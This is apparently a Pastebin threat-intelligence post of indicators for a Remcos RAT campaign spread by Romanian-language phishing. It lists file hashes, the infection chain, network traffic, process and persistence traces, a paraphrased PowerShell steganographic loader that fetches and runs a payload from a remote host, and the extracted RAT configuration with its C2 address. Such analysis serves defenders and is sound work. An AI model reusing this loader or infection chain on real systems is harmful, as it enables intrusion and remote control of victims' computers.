Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #remcos #RAT #stego #pngbase64 #RegAsm #PowerShell
- https://pastebin.com/cud9xwfs
- previous_contact:
- 19/01/24 https://pastebin.com/EvXHfZUB
- 18/01/24 https://pastebin.com/FL2fX362
- 25/12/23 https://pastebin.com/D535PVm3
- 21/12/23 https://pastebin.com/samYnJq6
- 30/11/23 https://pastebin.com/aG6XyqHN
- 13/11/23 https://pastebin.com/tbRpiGG5
- 06/02/23 https://pastebin.com/kjv5E8Au
- FAQ:
- https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
- attack_vector
- --------------
- email attach .docx (T1221) > get .doc (11882) > get .vbs > get base64 > get .png (stego) > get .txt > decode > inject RegAsm.exe > C2
- # # # # # # # #
- email_headers
- # # # # # # # #
- Date: 25 Jan 2024 02:58:03 -0800
- Subject: Fw: Re: Re: Re: Confirmarea comenzii si plata
- From: Mert Tural<contact@ laceys_icu>
- Received: from laceys_icu (HELO mail0_laceys_icu) ([216_9_224_90])
- Message-ID: <20240125025803.5754DAE9059F10D7@ laceys_icu>
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035
- File name Copie de plată.docx [ Microsoft Word 2007+ ] !Template Injection
- File size 30.64 KB (31375 bytes)
- SHA-256 1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640
- File name microsoftinteroird___.doc [ Rich Text Format ] !11882 EQUATION
- File size 64.80 KB (66353 bytes)
- SHA-256 d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae
- File name ISOupdate.vbs [ JavaScript ] !Detect sandbox
- File size 156.03 KB (159776 bytes)
- SHA-256 652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9
- File name d3zoY [ JavaScript ] !Base64 2 PowerShell
- File size 47.32 KB (48457 bytes)
- SHA-256 14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1
- File name uwp4241942.png [ PNG image data ] !Stego Loader BASE64_START
- File size 17.73 MB (18594320 bytes)
- SHA-256 e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042
- File name CNF.txt [ Reverse Base64 ] !REMCOS encoded payload
- File size 644.00 KB (659456 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR wallpapercave_com /uwp/uwp4241942.png (LOADER)
- 172_232_189_152 /359/CNF.txt (REMCOS)
- C2 top_noforabusers1_xyz : 2424 147_124_215_172 : 2424
- netwrk
- --------------
- 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
- 172_67_188_27 tau_id 80 HTTP OPTIONS / HTTP/1.1 Microsoft Office Protocol Discovery
- 172_67_188_27 443 SSLv2 Client Hello
- 172_67_188_27 tau_id 80 HTTP GET /ze87s HTTP/1.1 Mozilla/4.0 (MSOffice 12)
- 172_232_189_152 80 HTTP GET /cdf/microsoftinteroird___.doc HTTP/1.1 Mozilla/4.0 (MSOffice 12)
- 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
- 172_67_188_27 tau_id 80 HTTP HEAD /ze87s HTTP/1.1 Microsoft Office Existence Discovery
- 172_232_189_152 80 HTTP GET /359/ISOupdate.vbs HTTP/1.1
- 188_114_97_9 paste_ee 80 HTTP GET /d/d3zoY HTTP/1.1 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
- 188_114_97_9 paste_ee 443 TLSv1 Client Hello
- 104_22_53_71 wallpapercave_com 443 TLSv1.2 Client Hello
- 172_232_189_152 80 HTTP GET /359/CNF.txt HTTP/1.1
- 147_124_215_172 2424 TLSv1.3 Client Hello
- comp
- --------------
- WINWORD.EXE TCP 172_67_188_27 80 ESTABLISHED
- WINWORD.EXE TCP 172_67_188_27 443 ESTABLISHED
- WINWORD.EXE TCP 172_232_189_152 80 ESTABLISHED
- WScript.exe TCP 188_114_97_9 443 ESTABLISHED
- powershell.exe TCP 104_22_53_71 443 ESTABLISHED
- powershell.exe TCP 172_232_189_152 80 ESTABLISHED
- RegAsm.exe TCP 147_124_215_172 2424 ESTABLISHED
- proc
- --------------
- C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE
- "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\AppData\Roaming\ISOupdate.vbs"
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command ...
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 172_232_189_152 /359 / CNF.txt
- "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" *.vbs -Destination C:\ProgramData\svch.vbs
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\bitjt"
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\llzcugmi"
- C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe /stext "C:\TEMP\wfevvzxcdsr"
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 25.01.2024 13:25
- Path File not found: C:\ProgramData\svch.vbs.exe
- drop
- --------------
- %temp%\Temporary Internet Files\Content.IE5\*\microsoftinteroird___[1].doc
- %temp%\Temporary Internet Files\Content.IE5\*\ze87s[1]
- %temp%\Temporary Internet Files\Content.IE5\*\ISOupdate[1].vbs
- C:\Users\operator\AppData\Roaming\ISOupdate[1].vbs
- %temp%\bitjt
- %temp%\llzcugmi
- %temp%\wfevvzxcdsr
- # # # # # # # #
- additional info
- # # # # # # # #
- powershell load remcos:
- --------------
- imageUrl = 'wallpapercave_com / uwp / uwp4241942.png'
- webClient = System.Net.WebClient
- imageBytes = DownloadData(image_Url)
- imageText = UTF8.GetString(image_Bytes)
- startFlag = '<<BASE64_START>>; endFlag = <<BASE64_END>>
- base64Command = image_Text_Substring
- commandBytes = Convert ::From_Base64String
- loadedAssembly = : Load (command_Bytes)
- type = loaded_Assembly_GetType (Aspose.DrawingSpec.PkikAttrCertNB)
- method = Run . Invoke 172_232_189_152 / 359 / CNF.txt desativado svch C:\ProgramData\ LnkName RegAsm
- remcos config
- --------------
- {
- "Version": "4.9.3 Pro",
- "Host:Port:Password": "top_noforabusers1_xyz : 2424 : 1",
- "Assigned name": "RemoteHost",
- "Connect interval": "1",
- "Install flag": "Disable",
- "Setup HKCU\\Run": "Enable",
- "Setup HKLM\\Run": "Enable",
- "Install path": "Application path",
- "Copy file": "remcos.exe",
- "Startup value": "Disable",
- "Hide file": "Disable",
- "Mutex": "Rmc-M4OLK2",
- "Keylog flag": "0",
- "Keylog path": "Application path",
- "Keylog file": "logs.dat",
- "Keylog crypt": "Disable",
- "Hide keylog file": "Disable",
- "Screenshot flag": "Disable",
- "Screenshot time": "10",
- "Take Screenshot option": "Disable",
- "Take screenshot title": "",
- "Take screenshot time": "5",
- "Screenshot path": "AppData",
- "Screenshot file": "Screenshots",
- "Screenshot crypt": "Disable",
- "Mouse option": "Disable",
- "Delete file": "Disable",
- "Audio record time": "5"
- }
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/e2ee9ac33c1e07a99f8cc6044f0a7b830e892fbfbfd7d6e8db916707e9c34035/details
- https://www.virustotal.com/gui/file/1de402b1aa5fcf8a3782a2656b75dd8e943b68e181acc45ef85b32df95f2b640/details
- https://www.virustotal.com/gui/file/d8ee4672494c3a0141cad7cfd5ba867b85b7e6b00bec09aad83d0ead054243ae/details
- https://www.virustotal.com/gui/file/652c8b88469fc78b55ce828bf6a7f602e8daac730470ebd7e8cd836d8c1600b9/details
- https://www.virustotal.com/gui/file/14d46f274c0a4714fd4d9156edc0f2f695b6d3c650b1e9f0d1b4f286c7caa6a1/details
- https://www.virustotal.com/gui/file/e0bdc21402c6a619102441d22b88b5e575fec496e24e6103b62132e77ef31042/details
- VR
Add Comment
Please, Sign In to add comment